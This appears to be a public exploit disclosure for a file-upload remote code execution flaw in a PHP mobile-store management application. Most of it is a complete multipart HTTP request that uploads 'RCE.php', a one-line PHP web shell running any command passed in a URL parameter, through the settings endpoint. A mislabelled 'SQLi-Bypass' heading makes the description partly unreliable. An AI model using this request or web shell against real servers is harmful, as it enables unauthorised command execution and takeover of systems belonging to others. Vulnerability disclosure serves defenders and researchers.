Share
## https://sploitus.com/exploit?id=PACKETSTORM:188690
# Titles: OCLS MSMS-PHP (by: oretnom23 ) v1.0 -Copyright ยฉ 2025. All rights reserved.
    ### File Upload-FU and Remote Code Execution-RCE Vulnerabilities
    # Author: nu11secur1ty
    # Date: 01/15/2025
    # Vendor: https://github.com/oretnom23
    # Software:
    https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
    # Reference: https://portswigger.net/web-security/file-upload |
    https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
    
    ## Description:
    The update_settings app with parameter "cimg" is vulnerable for File Upload
    and then Remote Code Execution without any execution permission sanitizing.
    The attacker can upload absolutely DANGEROUS files on that server and he
    can destroy it with one click!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    - SQLi-Bypass login authentication:
    
    ```RCE
    POST /pwnedhost/php-ocls/classes/SystemSettings.php?f=update_settings
    HTTP/1.1
    Host: 192.168.100.45
    Cookie: PHPSESSID=fk421742c62350l42lajjv1p7a
    Content-Length: 6336
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
    Sec-Ch-Ua-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Origin: https://192.168.100.45
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.100.45/pwnedhost/php-ocls/admin/?page=system_info
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    Connection: keep-alive
    
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="name"
    
    Mobile Store Management System - PHP
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="short_name"
    
    MSMS-PHP
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="about_us"
    
    <p style="text-align: center; margin-right: 0px; margin-bottom: 0px;
    margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px;
    line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px;
    clear: both; border-top: 0px; height: 1px; background-image:
    linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0,
    0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position:
    relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding:
    0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left;
    text-align: right; color: rgb(0, 0, 0); font-family: "Open Sans", Arial,
    sans-serif; font-size: 14px; background-color: rgb(255, 255,
    255);"></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding:
    0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right;
    color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;
    font-size: 14px; background-color: rgb(255, 255, 255);"></div><div
    class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both;
    color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;
    font-size: 14px; text-align: center; background-color: rgb(255, 255,
    255);"><div id="lipsum" style="margin: 0px; padding: 0px; text-align:
    justify;"></div></div></div><p style="margin-right: 0px; margin-bottom:
    15px; margin-left: 0px; padding: 0px;">Lorem ipsum dolor sit amet,
    consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non
    lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum.
    Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit
    pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo
    tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in
    faucibus. Pellentesque habitant morbi tristique senectus et netus et
    malesuada fames ac turpis egestas. Praesent eleifend interdum est, at
    gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu.
    Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus
    porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut
    vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula,
    aliquam purus quis, pharetra lorem.</p><p style="margin-right: 0px;
    margin-bottom: 15px; margin-left: 0px; padding: 0px;">Proin consectetur
    massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent
    taciti sociosqu ad litora torquent per conubia nostra, per inceptos
    himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh.
    In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor
    lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque
    vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam.
    Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat
    libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper
    cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien
    consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor
    vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula
    tellus eleifend sit amet.</p><p style="margin-right: 0px; margin-bottom:
    15px; margin-left: 0px; padding: 0px;">Morbi id ante vel velit mollis
    egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus
    faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id
    ultricies mollis, lectus velit viverra mi, at venenatis velit purus id
    nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla
    at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non
    lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus
    interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec
    volutpat tincidunt.</p><p style="margin-right: 0px; margin-bottom: 15px;
    margin-left: 0px; padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis
    felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel
    elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non
    lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra
    nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet
    metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi.
    Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo
    nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet
    varius augue.</p><p style="margin-right: 0px; margin-bottom: 15px;
    margin-left: 0px; padding: 0px;">Sed quis imperdiet est. Donec lobortis
    tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin
    risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui
    ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis
    mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi.
    Vivamus tristique maximus nulla, vel mollis felis blandit posuere.
    Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean
    neque sapien, volutpat a ullamcorper nec, iaculis quis est.</p>
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="privacy_policy"
    
    <p>Sample Privacy Policy<br></p>
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="img"; filename="RCE.php"
    Content-Type: application/octet-stream
    
    <?php echo shell_exec($_GET["cmd"]);?>
    
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="cover"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw
    Content-Disposition: form-data; name="banners[]"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryLoVYEHwi1qVl5nBw--
    
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/ocls-msms-php-by-120042620)
    
    
    ## Time spent:
    01:15:00